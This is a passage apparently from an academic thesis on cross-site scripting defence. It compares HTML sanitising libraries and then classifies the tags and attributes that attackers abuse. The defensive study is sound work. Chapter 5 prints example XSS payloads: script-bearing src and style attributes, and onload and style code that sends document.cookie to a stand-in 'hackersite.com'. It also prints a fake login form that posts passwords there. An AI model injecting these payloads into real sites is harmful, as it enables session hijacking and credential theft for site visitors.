Above shown is the message posted by user. The result after passing this message to AntiSamy will be:
<input type=”button” value=”Hi!”>
The knowledge base for the filter’s engine is an XML file called antisamy.xml. The same policy file can be used across multiple implementations (.Net, J2EE, etc.). The default policy file was tailored to W3C’s HTML 4.0 and CSS 2.0 specifications. Thus any official attributes which is dictated by the specifications can be used. If a user agent supports an attribute not specified, it can be added to the policy file, though some effort has already been put in integrating those non-standard attributes which are being used and honored in the wild.
To summarize, OWASP AntiSamy is an API implemented in Java and .Net to ensure user-supplied HTML/CSS is in compliance within an application rules. It has very good XSS cleaning abilities, so long as it removes things it doesn’t recognize. Architecturally speaking, OWASP AntiSamy is highly dependent on policy files, which is a highly extended form of XML Schema with information on what attributes and elements to allow. As such, the actual code for filtering is relatively light-weight. Unfortunately, while XML Schema files can get a high level of control on the validation, the regular expression heavy approach begins showing signs of stress when data-types are complex (e.g. URIs).
3.2 The strip_tags()
The PHP function strip_tags() [STT] is the classic solution for attempting to clean up HTML from unwanted tags (like <script> or </script>). It is the worst solution of all to avoid XSS because, the fact that it doesn't validate attributes at all (means that anyone can insert malicious scripts in attributes like onmouseover='xss();' and exploit the application). While this can be bandaided with a series of regular expressions that strip out on[event], striptags() is fundamentally flawed and should not be used. Example of using strip_tags is illustrated below:
<?php
$text = '<p>Test paragraph.</p><!-- Comment --> <a href="#fragment">Other text</a>'; echo strip_tags($text);
25
echo strip_tags($text, '<p><a>'); // Allow <p> and <a> ?>
In the above example, strip_tags() strips all the tags except <p> and <a> tags. By using this malicious tags like <script>, <style> and <form> can be stripped out, but we cannot validate the values of attributes. To validate attributes of tags, we can write extra code at server side, but the solution cannot be efficient and effective.
3.3 PHP Input Filter
PHP Input Filter [PIF] is the upgraded version of striptags(), with the ability to inspect attributes. PHP Input Filter implements an HTML parser, and performs very basic checks on whether or not tags and attributes have been defined in the whitelist (left upto user what he will permit). Since it completely fails in checking the well-formedness, it is trivially easy to trick the filter into leaving unclosed tags. Any user that allows the style attribute will be in great trouble as we can't simply just let CSS through and expect layout not to be badly mutilated.
3.4 HTML_Safe/SafeHTML
HTML_Safe/SafeHTML [HTS] mechanism of action involves parsing HTML with a SAX parser and performing validation and filtering as the handlers are called. strip_tags can only strip tags. HTML_safe strips down all active content, including tags, attributes and values of atrributes. This parser strips down all potentially dangerous content within HTML:
opening tag without its closing tag
closing tag without its opening tag
any of these tags: "base", "basefont", "head", "html", "body", "applet", "object", "iframe", "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound", "link", "meta", "style", "title", "blink", "xml" etc.
any of these attributes: on*, data*, dynsrc
26 expression/behavior etc. in styles
any other active content
It also tries to convert code to XHTML valid, but htmltidy is far better solution for this task. HTML_Safe does a lot of things right, like blacklisting the list of dangerous attributes, But by blacklisting tags (like style, applet, etc) for the reason that it have some dangerous attributes will result in loss of functionality. Added to this it blocks all the occurrences of XSS by stripping it off.
3.5 Kses
Kses [KSS] is an HTML/XHTML filter written in PHP. It removes all unwanted HTML elements and attributes, and it also does several checks on attribute values (to avoid buffer overflow attacks). Kses can be used to avoid XSS, as it will only allow the HTML elements and attributes that it was explicitly told to allow. It will remove additional "<" and ">" characters that people may try to sneak in somewhere. The set of API’s that Kses allow its user to use are shown below with explaination.
Table 3.1: Kses API’s
API Functionality
Parse($string = "") The basic function of kses. Give it a $string, and it will strip out the unwanted HTML and attributes.
AddProtocols() Add a protocol or list of protocols to the kses object to be considered valid during a Parse(). The parameter can be a string containing a single protocol, or an array of strings, each containing a single protocol.
Protocols() Deprecated. Use AddProtocols()
AddProtocol($protocol = "") Adds a single protocol to the kses object that will be considered valid during a Parse().
27
SetProtocols() This is a straight setting/overwrite of existing protocols in the kses object. All existing protocols are removed, and the parameter is used to determine what protocol(s) the kses object will consider valid. The parameter can be a string containing a single protocol, or an array of strings, each constaining a single protocol.
DumpProtocols() This returns an indexed array of the valid protocols contained in the kses object.
DumpElements() This returns an associative array of the valid (X)HTML elements in the kses object along with attributes for each element, and tests that will be performed on each attribute.
AddHTML($tag = "", $attribs = array())
This allows the end user to add a single (X)HTML element to the kses object along with the (if any) attributes that the specific (X)HTML element is allowed to have.
RemoveProtocol($protocol = "")
This allows for the removal of a single protocol from the list of valid protocols in the kses object.
RemoveProtocols() This allows for the single or batch removal of protocols from the kses object. The parameter is either a string containing a protocol to be removed, or an array of strings that each contain a protocol.
filterKsesTextHook($string) For the OOP (Object Oriented Programming) version of kses, this is an additional hook that allows the end user to perform additional postprocessing of a string that's being run through Parse().
28
Configuring and usage of the Kses API’s are very simple and flexible, like user can set the protocols that he want to allow or disallow, user can configure the API to add or remove the element or attribute from the preconfigured Kses. Users are supposed to be very cautious in using API’s, as different ways of using API’s results in different functionality. But Kses is not a very good option as it has many loop holes which are exposed publicly by its users [GEL].
3.6 htmLawed
To say about htmLawed in its developers words, the highly-customizable htmLawed [HTM, HTL] filter can be used to make text with HTML more secure, policy-compliant. It can auto-correct and beautify HTML markup and restrict HTML elements (tags), attributes, and URL protocols in the input. It also balances tags and checks for proper nesting of the HTML elements. Furthermore, it can transform deprecated tags and attributes, check and convert character entities (e.g., from hexadecimal to decimal type), obfuscate email addresses as an anti-spam measure, etc. The set of features that htmLawed provides seems to be quite appreciable. But it just strips of all the occurrences of script. It fails in validating and differentiating the simple script from XSS.
At the other hand, web researches say [HTP]; htmLawed is modified version of Kses (with some features added). It just strips of the script tag in order to avoid execution of script and validation of attribute values is not so good (it allows inclusion of cgi/javascript/html files which may lead to XSS).
3.7 Safe HTML Checker
Safe HTML Checker [SHC] is of same flavor as others, but which is well written piece of code (strict in checking and parsing the tags). It is a white listing filter which filters all occurrences of non found tags in the filter list. It is very strict in filtering all the occurrences of script and CSS (Cascading Style Sheet). Safe HTML Checker is developed to satisfy the requirements shown below.
1. Entered markup should be valid to XHTML strict, to stop comments form breaking validation and keep things nice and tidy.
29
2. No presentational markup! They wanted web administrator to have complete control over style sheets and comments posted should only be able to use structural HTML elements. 3. Attributes should be restricted to those that add semantic meaning. Javascript event
attributes and CSS related attributes should not be allowed.
4. Web Administrator should retain full control over the tags and attributes allowed in the comments.
5. Submitted HTML must be kept free from anything that could pose a security risk, such as javascript: URLs.
Just to satisfy these requirements, developer of Safe HTML Checker was not much worried in the loss of functionality by his solution.
3.8 HTML Purifier
HTML Purifier [HTP] is a standards-compliant HTML filter library written in PHP. Developers of HTML Purifier claim that it will remove all scripting code by auditing it thoroughly, which is the loss of functionality provided. This is not less than all other existing solutions in stripping off all the occurrences of script.
3.9 Summary
Regarding the available API/tool support, the present situation is not so (at all) encouraging. Even the combination of all the approaches is not promising for web application security; hardly any tools support the proper approach. Absence of holistic approach in identifying the proper XSS attack is genuine matter of concern for web application security.
30
CHAPTER 4
PROBLEM STATEMENT
Simple script inserted in the message is very often misunderstood as XSS attack. Scripting is a functionality provided for better ever experience. In existing solutions, any script inserted is always assumed to be malicious and being stripped. For example, alert(“XSS”) is not malicious because it does not harm the user. In contrast, alert(document.cookie) is malicious because it is trying to access the browser DOM object (which is supposed to be secure). This may lead to hijacking of the user session. As per security terms, one that harms a legitimate user is an attack. Hence we claim that just inserting any script cannot be XSS attack.
Having understood the XSS attacks, another challenge that we identified to safe guard the users from XSS attacks is whether to go with server side solution or client side solution. Client side solution can help the users who are security conscious; who are familiar of XSS attacks and the one who have some technical expertise (to use the solution we provide), such solution may not help the novice users.
This project aims at developing holistic server side XSS API which differentiates the XSS attack from simple script and strips it off. Thus novice users can enjoy the safe and better experience of browsing without any surge of functionality, need of additional software or configuration at browser side. Developing such API also reduces burden to web administrators to safe guard their web applications from malignant XSS attacks.
31
CHAPTER 5
DIFFERENTIATING XSS FROM SIMPLE SCRIPTS
An analysis of available and widely used solutions for XSS is discussed in Chapter 3. The point that existing solutions are missing out and giving scope for the new set of problem (s), are discussed in Chapter 4. This Chapter will roam around the solution for the problem/challenge identified.
As it is well known fact that XSS will occur because of some malicious script inserted by an attacker in the web application, before we find what can be malicious script, we should find the scope of an attacker to insert malicious script in the web application. Basically while designing the Markup Languages, none of the tags and/or its attributes is meant for malicious purpose. They are made for the genuine usage, but the attackers/hackers use these tags and /or its attributes for their profits (basically for name or fame or robbing). By our observation, we found a list of tags and/or its attributes which give scope for an attacker to insert malicious script, and the same is shown in Table 5.1:
Table 5.1: Tags and its attributes which are in favour of attackers
Tag Attribute
form action
body background
applet code
object data
a, area, link href
iframe, frame, img longdesc
32
a, area, button, input, label, select, textarea onblur
input, select, textarea onchange
a, abbr, acronym, address, area, tt, i, b, small, big, body, button, caption, center, em, strong, dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt, fieldset, form, h1 - h14, input, ins, label, legend, li, link, map, menu, noframes, noscript, ol, hr, img, optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody td, textarea, tfoot, th, thead, tr, u, ul
onclick, ondblclick, onkeydown, onkeypress, onkeyup, onmousedown, onmousemove, onmouseout, onmouseover, onmouseup h15 ondblclick h15 - h16, onmousedown h15 - h17, onmousemove h15 - h18, onmouseout h15 - h19, onmouseover h15 - h20, onmouseup h15 - h21, onkeydown h15 - h22, onkeypress h15 - h23, onkeyup
body, frameset onload
a, area, button, input, label, select, textarea onfocus
33
input, textarea onselect
form onsubmit
body, frameset onunload
frame, iframe, img, input, script src
a, abbr, acronym, address, applet, area, tt, I, b, small, big, basefont, bdo, blockquote, body, br, button, caption, center, em, strong, dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt, fieldset, font, form, frame, frameset, h1 - h11, hr, iframe, img, input, ins, label, legend, li, link, map, menu, noframes, noscript, object, ol, optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody, td, textarea, tfoot, th, thead, tr, u, ul
style
Having understood that the above tags and/or its attributes give scope for an attacker to insert some malicious script, it is extremely necessary to know, how they are accessible to an attacker. The total set of attributes found vulnerable can be categorized into three types:
1. Set of attributes giving scope for content out of the actual page, such as href, src, etc, through which a page/object with some malicious content can be included in the existing page.
2. Set of attributes which allows user to write script directly, such as onload, onmouse, onclick, etc, through which some malicious script can be included.
3. Set of attributes which allows user to do stylings for his content.
These three categories how they are different can be understood better with an example. The first type is the set of attributes which include external object/content to the current/existing page. To illustrate how these attributes can act malicious, we’ll take <input> tag of image type. For the <input> tag of image type, some external image content will be fed using an attribute
34
called “SRC”, which displays the image in the existing page. But an attacker will insert some malicious script instead of feeding the location of the image location. One such example is shown below, which will alarm with the session cookie, every time the page is loaded. Just alarming is exactly not malicious script, but since it is alarming with the user session cookie which is supposed to be secure, it is considered to be malicious.
<INPUT TYPE="IMAGE" SRC="javascript:alert(document.cookie);">
The set of attributes that belong to this category are: action, background, classid, code, data, href, longdesc, src.
This type of attributes should be set to restrictions in allowing the external content based on the tag and type of attribute. The allowed set of extensions for each of the tag and its attributes are shown below:
Table 5.2: Extensions allowed
Tag Attribute Allowed Extensions
img, input
(type=image)
src, lowsrc, dynsrc
.jpg, .jpeg, .png, .xbm, .gif, .bmp
a, area, link href .htm, .html, .asp, .jsp, .php, .aspx, .swf, .rb, .pl, .cgi
frame, iframe src .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp, .php, .aspx
Any Tag longdesc .txt, .rtf, .doc
embed src .pdf, .doc, .wav
Any Tag background .jpg, .jpeg, .png, .xbm, .gif, .bmp
script src This attribute is not allowed
35
applet code .class
object classid .class, .py, .rb
object data .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp, .php, .aspx, .flv, .mov, .wmv, .rm, .ra, .ram
The second type is the set of attributes which allows users to insert some script directly. Allowing user to insert script directly is similar to leaving the bank open 24 Hrs, which makes easy for thief to rob the bank. But in the way banks make its security system alert to protect their customer’s wealth from thief, web administrator should make sure of the security system, to safe guard the novice users. To understand how these type of attributes how it can be malicious, an example is illustrated below, which will open a new window every time the page is loaded and posts the novice user’s session cookie to attacker site through which session hijacking will be done.
<BODY ONLOAD= window.open( http://hackersite.com/info.pl?captcha=document.cookie)>
The set of attributes that belong to this category are: onblur, onclick, ondblclick, onfocus, onmousedown, onmousemove, onmouseout, onmouseover, onmouseup, onkeydown, onkeypress, onkeyup, onload, onunload, onabort, onblur, onchange, onreset, onselect, onsubmit.
The last and the third kind of attribute set will allow user to set the style for his content. Examples explained for Type 1 and Type 2 categories of attributes are modified here to illustrate, how third set of attributes can be used as vulnerable.
<DIV STYLE="background-image: url(javascript:alert(document.cookie))"> <DIV STYLE="background-image: url(window.open(
http://hackersite.com/info.pl?captcha=document.cookie))">
36
To save novice users from XSS, we should contemplate on four more tags apart from all the attributes listed above, namely <script>, <style>, <form> and <base> tags. The <script> tag will be used by an attacker to insert some malicious script directly. The <base> tag is generally used to refer the defined path for the content in the page. This also can be used by an attacker to edit the path of reference or redirect it to his site. In the way style attribute is used, similarly <style> tag will be used to insert malicious script. Such an example is shown below:
<STYLE class=’test’>background-image: url(window.open(
http://hackersite.com/info.pl?captcha=document.cookie</STYLE>
In the above example, instead of giving the back ground image URL, a malicious script is given, which on execution will open a new window and sends the user’s session cookie to hacker’s site.
To save users from XSS kind of phishing attack which is explained in Section 2.6.3, we should ponder upon inner text and action attribute of <form> tag. Illustration of how <form> tag’s inner text will be used by an attacker is shown below:
<form action=’http://hackersite.com/exec.cgi’> <b>User Name: </b>
<input type=’text’ size=20> <br>
<b>Password: </b>
<input type=’password’ size=20> <button type=’submit’>
</form>
In the example shown above it creates the html form that displays two text boxes asking username and password, on submit which posts the content to hacker’s site. If an attacker posts this message in the banking website user forum, when an innocent user visits this page, he will login and which may result in huge loss for the user. Since inner text of <form> tag has such a serious impact it is always better to strip off any content in <form> tag. Apart from inner text of <form> tag, ‘action’ attribute also can be used by an attacker to hack the user’s username and password. An attacker will post a message with <form> tag and some malicious script which will replace the actual <form> tag with this inserted one. The result of such post is obvious that it